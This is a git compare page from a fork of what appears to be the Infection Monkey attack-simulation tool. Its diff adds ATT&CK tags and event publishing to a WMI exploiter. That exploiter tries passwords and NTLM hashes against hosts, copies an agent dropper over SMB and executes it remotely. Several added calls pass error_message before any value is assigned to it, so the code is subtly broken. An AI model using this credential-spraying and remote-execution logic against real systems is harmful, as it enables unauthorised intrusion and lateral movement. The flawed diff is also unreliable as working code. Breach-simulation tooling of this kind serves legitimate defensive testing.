forked from p34709852/monkey
Compare commits
4 Commits
develop
...
2269-publi
Author | SHA1 | Date |
---|---|---|
Ilija Lazoroski | d1427117c7 | |
Ilija Lazoroski | 6950dcdf0c | |
Ilija Lazoroski | c09c2c2127 | |
Ilija Lazoroski | ed191bcf61 |
|
@ -2,10 +2,16 @@ import logging
|
||||||
import ntpath
|
import ntpath
|
||||||
import socket
|
import socket
|
||||||
import traceback
|
import traceback
|
||||||
|
from time import time
|
||||||
|
|
||||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
|
|
||||||
from common.credentials import get_plaintext
|
from common.credentials import get_plaintext
|
||||||
|
from common.tags import (
|
||||||
|
T1021_ATTACK_TECHNIQUE_TAG,
|
||||||
|
T1105_ATTACK_TECHNIQUE_TAG,
|
||||||
|
T1110_ATTACK_TECHNIQUE_TAG,
|
||||||
|
)
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
|
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
|
||||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
||||||
|
@ -21,10 +27,15 @@ from infection_monkey.utils.threading import interruptible_iter
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
WMI_EXPLOITER_TAG = "wmi-exploiter"
|
||||||
|
|
||||||
|
|
||||||
class WmiExploiter(HostExploiter):
|
class WmiExploiter(HostExploiter):
|
||||||
_EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
|
_EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
|
||||||
|
|
||||||
|
_EXPLOITER_TAGS = (WMI_EXPLOITER_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG)
|
||||||
|
_PROPAGATION_TAGS = (WMI_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
|
||||||
|
|
||||||
@WmiTools.impacket_user
|
@WmiTools.impacket_user
|
||||||
@WmiTools.dcom_wrap
|
@WmiTools.dcom_wrap
|
||||||
def _exploit_host(self) -> ExploiterResultData:
|
def _exploit_host(self) -> ExploiterResultData:
|
||||||
|
@ -44,6 +55,7 @@ class WmiExploiter(HostExploiter):
|
||||||
|
|
||||||
wmi_connection = WmiTools.WmiConnection()
|
wmi_connection = WmiTools.WmiConnection()
|
||||||
|
|
||||||
|
timestamp = time()
|
||||||
try:
|
try:
|
||||||
wmi_connection.connect(
|
wmi_connection.connect(
|
||||||
self.host,
|
self.host,
|
||||||
|
@ -55,26 +67,34 @@ class WmiExploiter(HostExploiter):
|
||||||
)
|
)
|
||||||
except AccessDeniedException:
|
except AccessDeniedException:
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
error_message = f"Failed connecting to {self.host} using WMI"
|
||||||
|
logger.debug(error_message)
|
||||||
|
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||||
continue
|
continue
|
||||||
except DCERPCException:
|
except DCERPCException:
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||||
|
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
except socket.error:
|
except socket.error:
|
||||||
logger.debug(f"Network error in WMI connection to {self.host}")
|
error_message = f"Network error in WMI connection to {self.host}"
|
||||||
|
logger.debug(error_message)
|
||||||
|
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
logger.debug(
|
error_message = (
|
||||||
f"Unknown WMI connection error to {self.host}: "
|
f"Unknown WMI connection error to {self.host}: "
|
||||||
f"{exc} {traceback.format_exc()}"
|
f"{exc} {traceback.format_exc()}"
|
||||||
)
|
)
|
||||||
|
logger.debug(error_message)
|
||||||
|
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||||
self.exploit_result.exploitation_success = True
|
self.exploit_result.exploitation_success = True
|
||||||
|
self._publish_exploitation_event(timestamp, True, error_message=error_message)
|
||||||
|
|
||||||
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
||||||
|
|
||||||
|
@ -84,6 +104,7 @@ class WmiExploiter(HostExploiter):
|
||||||
|
|
||||||
target_path = get_agent_dst_path(self.host)
|
target_path = get_agent_dst_path(self.host)
|
||||||
|
|
||||||
|
propagation_timestamp = time()
|
||||||
remote_full_path = SmbTools.copy_file(
|
remote_full_path = SmbTools.copy_file(
|
||||||
self.host,
|
self.host,
|
||||||
downloaded_agent,
|
downloaded_agent,
|
||||||
|
@ -119,27 +140,23 @@ class WmiExploiter(HostExploiter):
|
||||||
|
|
||||||
if (0 != result.ProcessId) and (not result.ReturnValue):
|
if (0 != result.ProcessId) and (not result.ReturnValue):
|
||||||
logger.info(
|
logger.info(
|
||||||
"Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
|
f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
|
||||||
remote_full_path,
|
f"(pid={result.ProcessId}, cmdline={cmdline})"
|
||||||
self.host,
|
|
||||||
result.ProcessId,
|
|
||||||
cmdline,
|
|
||||||
)
|
)
|
||||||
|
|
||||||
self.add_vuln_port(port="unknown")
|
self.add_vuln_port(port="unknown")
|
||||||
self.exploit_result.propagation_success = True
|
self.exploit_result.propagation_success = True
|
||||||
|
self._publish_propagation_event(propagation_timestamp, True)
|
||||||
else:
|
else:
|
||||||
error_message = (
|
error_message = (
|
||||||
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
|
f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
|
||||||
"cmdline=%r)",
|
f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
|
||||||
remote_full_path,
|
|
||||||
self.host,
|
|
||||||
result.ProcessId,
|
|
||||||
result.ReturnValue,
|
|
||||||
cmdline,
|
|
||||||
)
|
)
|
||||||
logger.debug(error_message)
|
logger.debug(error_message)
|
||||||
self.exploit_result.error_message = error_message
|
self.exploit_result.error_message = error_message
|
||||||
|
self._publish_propagation_event(
|
||||||
|
propagation_timestamp, False, error_message=error_message
|
||||||
|
)
|
||||||
|
|
||||||
result.RemRelease()
|
result.RemRelease()
|
||||||
wmi_connection.close()
|
wmi_connection.close()
|
||||||
|
|
Loading…
Reference in New Issue